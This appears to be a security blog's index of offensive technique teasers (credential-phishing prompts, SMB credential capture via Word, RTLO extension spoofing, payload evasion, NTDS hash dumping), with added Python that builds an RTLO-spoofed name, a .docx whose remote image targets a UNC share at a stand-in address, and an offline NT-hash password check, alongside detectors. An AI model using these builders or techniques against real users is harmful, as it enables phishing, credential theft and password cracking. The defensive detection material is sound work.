Phish domain user credentials with CredsLeaker with Powershell

CredsLeaker is a PowerShell script that phishes credentials from the logged-on user. It pops up a Windows-style authentication prompt and checks the entered details against the domain controller, re-prompting until it has received valid credentials. This prompt is common in a domain environment, so the user has probably seen it before and is unlikely to be suspicious. Once CredsLeaker …

Enumerate usernames on a domain with no permissions

RidRelay is a Python script to enumerate usernames on a domain where you have no permissions at all. It is a quick and easy way to get domain usernames while on an internal network. RidRelay combines the SMB relay attack, common lsarpc-based queries and RID cycling to get a list of domain usernames. It …

Microsoft CVE-2017-8759: .NET Framework Remote Code Execution Vulnerability

A remote code execution vulnerability exists when Microsoft .NET Framework processes untrusted input. An attacker who successfully exploited this vulnerability in software using the .NET Framework could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts …

Silently execute a PowerShell script with a C# application

One way to avoid detection of your payload is to embed the PowerShell payload in a semi-legitimate executable. You can create an executable that, for example, launches Microsoft Office or Google Chrome and uses the exact same icon. With this method the application acts as a middle-man: upon execution it …

Spoofing file extensions with the Unicode Character ‘RIGHT-TO-LEFT OVERRIDE’ (U+202E)

One of the more interesting things Windows supports is right-to-left text. This can be used to hide the real file extension of a document: by inserting the Unicode character U+202E (RIGHT-TO-LEFT OVERRIDE) into a file name, everything after it is displayed reversed, so the name appears to end in a harmless extension while its real extension is hidden. This website allows you to …
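As an added example (not code from the original post), the following Python shows the trick from the attacker's side and the check a defender would run on incoming file names: it builds a name containing U+202E, computes what a bidi-aware file browser displays, extracts the real extension with `os.path.splitext`, and flags any bidi control character. The rendering is a simplification of the Unicode bidi algorithm (an override is reversed until a POP DIRECTIONAL FORMATTING or end of string; nested embeddings are ignored); the sample names are constructed.

```python
"""Added example: RIGHT-TO-LEFT OVERRIDE (U+202E) extension spoofing and its detection."""
import os
import unicodedata

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: text after it is forced to display right-to-left
PDF = "\u202c"  # POP DIRECTIONAL FORMATTING: ends the override
# Bidi control characters; none of these belongs in a legitimate file name.
BIDI_CONTROLS = set("\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069")
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".ps1", ".js", ".vbs",
                   ".lnk", ".hta", ".msi"}


def spoofed_name(prefix: str, fake_ext: str, real_ext: str) -> str:
    """Attacker side: build a name that displays as prefix+fake_ext but ends in real_ext.
    Because the tail after U+202E is shown reversed, the fake extension is written
    backwards in front of the real one: ("photo_", ".jpg", ".scr") -> photo_<RLO>gpj.scr,
    which renders as photo_rcs.jpg."""
    return prefix + RLO + fake_ext.lstrip(".")[::-1] + real_ext


def rendered_name(name: str) -> str:
    """Approximate what a bidi-aware UI shows for `name` (simplified bidi: a U+202E
    run is reversed until U+202C or end of string; other controls are invisible)."""
    out, i = [], 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            if end == -1:
                end = len(name)
            out.append(name[i + 1:end][::-1])
            i = end + 1  # skip the PDF that closed the run, if any
        elif ch in BIDI_CONTROLS:
            i += 1       # zero-width control: contributes nothing visible
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def check_filename(name: str) -> dict:
    """Defender side: compare the displayed extension with the real one and list
    any bidi controls present. The real extension is what Windows executes on."""
    controls = sorted({unicodedata.name(c) for c in name if c in BIDI_CONTROLS})
    shown = rendered_name(name)
    real_ext = os.path.splitext(name)[1].lower()
    shown_ext = os.path.splitext(shown)[1].lower()
    return {
        "name": name,
        "displayed_as": shown,
        "real_extension": real_ext,
        "displayed_extension": shown_ext,
        "bidi_controls": controls,
        "suspicious": bool(controls) or real_ext != shown_ext,
        "executable": real_ext in EXECUTABLE_EXTS,
    }


def sanitize_name(name: str) -> str:
    """Strip bidi controls so the name renders the way it is spelled (for quarantine
    listings, logs and mail-gateway rewrites)."""
    return "".join(c for c in name if c not in BIDI_CONTROLS)


if __name__ == "__main__":
    # Constructed samples: one spoofed name, one clean name.
    for sample in (spoofed_name("photo_", ".jpg", ".scr"), "report.pdf"):
        result = check_filename(sample)
        print(f"{result['displayed_as']!r:24} real={result['real_extension']:5} "
              f"suspicious={result['suspicious']} controls={result['bidi_controls']}")
```

Note that `splitext` is the right primitive here: it operates on the stored code points, not on what the shell draws, so it always reports the extension Windows will actually act on.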

Remotely stealing windows credentials with WordSteal

Microsoft Word can include images from remote locations. This is an undocumented feature, but malware authors have been found using it to load images over HTTP for tracking statistics. We can also point the remote image at an SMB server, and the victim's machine will authenticate to it with the victim's login credentials. This is very useful during a …
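The remote image lives in the package's relationship parts: an `image` relationship whose `Target` is a UNC path or URL with `TargetMode="External"`. As an added example (not the WordSteal project's code), the Python below builds a minimal .docx skeleton carrying such a relationship, then scans a .docx for any external relationship in any `.rels` part, since headers, footers and footnotes have their own relationship files. The skeleton is only enough for the scanner, not a complete Word document; the share address `203.0.113.5` is a documentation address and the sample is constructed.

```python
"""Added example: external (SMB/HTTP) image relationships in a .docx and a scanner for them."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET  # for untrusted files prefer defusedxml with the same API

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
IMAGE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"
# UNC paths and URL schemes that make Word reach out to the network.
REMOTE_RE = re.compile(r"^(\\\\|//|(https?|file|smb)://)", re.IGNORECASE)


def build_sample_docx(remote_target: str) -> bytes:
    """Minimal package skeleton (constructed): one normal embedded image and one image
    whose target is external. Real documents also reference the rId from document.xml;
    that part is omitted because the scanner only needs the relationship parts."""
    rels = f'''<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{IMAGE_REL}" Target="media/image1.png"/>
  <Relationship Id="rId2" Type="{IMAGE_REL}" Target="{remote_target}" TargetMode="External"/>
</Relationships>'''
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", rels)
        z.writestr("word/media/image1.png", b"\x89PNG placeholder")
    return buf.getvalue()


def find_remote_references(docx_bytes: bytes) -> list:
    """Return every relationship, in any .rels part of the package, whose target is
    external: either TargetMode="External" is set or the target is a UNC path / URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                external = (rel.get("TargetMode", "").lower() == "external"
                            or bool(REMOTE_RE.match(target)))
                if external:
                    hits.append({
                        "part": part,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": target,
                    })
    return hits


if __name__ == "__main__":
    sample = build_sample_docx(r"\\203.0.113.5\share\logo.png")
    for hit in find_remote_references(sample):
        print(f"{hit['part']}: {hit['id']} ({hit['type']}) -> {hit['target']}")
```

A hit of type `image` with a UNC target is exactly the pattern the post describes; `hyperlink`, `oleObject` and `attachedTemplate` relationships can carry the same kind of target and are reported as well. The scan is a mail-gateway or sandbox control; the network-side mitigation is to block outbound SMB (TCP 445) at the perimeter so the authentication never leaves the network.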

Retrieve domain password hashes with Mimikatz

Mimikatz is a Windows security tool that can be used to extract passwords from Windows and Windows Server systems. One way of doing this manually is to extract the information from the NTDS.DIT file, which is the Active Directory database. This can be tricky, as the file is open and locked, and generally inaccessible, while the server is running. This …
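What comes out of NTDS.DIT is not a password but its NT hash, MD4 over the UTF-16LE encoding of the password, with no salt, which is why a dumped hash is directly reusable (pass-the-hash) and why the dump can be attacked offline. As an added example (not Mimikatz code, and not the extraction method the post goes on to describe), the Python below implements MD4 (hashlib often lacks it, since OpenSSL 3 moved it to the legacy provider), computes NT hashes, and checks a constructed pwdump-style line of the form `user:rid:lmhash:nthash:::` against candidate passwords. The sample user, RID and candidates are constructed; the LM field holds the well-known empty-LM value.

```python
"""Added example: NT hash = MD4(UTF-16LE(password)), and an offline check of a dumped hash."""
import struct

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def _f(x, y, z):  # round 1 function
    return ((x & y) | (~x & z)) & MASK


def _g(x, y, z):  # round 2 function (majority)
    return (x & y) | (x & z) | (y & z)


def _h(x, y, z):  # round 3 function
    return x ^ y ^ z


# (function, additive constant, message-word order, per-step rotation amounts) per RFC 1320
_ROUNDS = (
    (_f, 0x00000000, (0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15), (3, 7, 11, 19)),
    (_g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
    (_h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
)


def md4(data: bytes) -> bytes:
    """MD4 digest (RFC 1320). Little-endian words, 0x80 + zero padding, 64-bit bit length."""
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    padded = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    for off in range(0, len(padded), 64):
        x = struct.unpack("<16I", padded[off:off + 64])
        a, b, c, d = state
        for fn, k, order, shifts in _ROUNDS:
            for j, i in enumerate(order):
                # Each step updates one register; rotating the tuple walks A,D,C,B as the spec does.
                a = _rotl((a + fn(b, c, d) + x[i] + k) & MASK, shifts[j % 4])
                a, b, c, d = d, a, b, c
        state = [(s + v) & MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """The value stored for a domain account: MD4 of the UTF-16LE password, unsalted."""
    return md4(password.encode("utf-16-le")).hex()


def parse_pwdump_line(line: str) -> dict:
    """user:rid:lmhash:nthash::: as written by Mimikatz / secretsdump-style dumps."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}


def check_candidates(line: str, candidates) -> "str | None":
    """Offline check: return the first candidate whose NT hash matches the dumped one."""
    entry = parse_pwdump_line(line)
    for pw in candidates:
        if nt_hash(pw) == entry["nt"]:
            return pw
    return None


# Constructed sample line (user and RID invented; the NT hash is that of "password").
SAMPLE_LINE = "jsmith:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::"

if __name__ == "__main__":
    print(nt_hash("password"))
    print(check_candidates(SAMPLE_LINE, ["Winter2017!", "password"]))
```

Because there is no salt, identical passwords produce identical hashes across every account in the dump, so sorting a dump by NT hash immediately reveals shared passwords between accounts; that is the first check worth running on any NTDS extract.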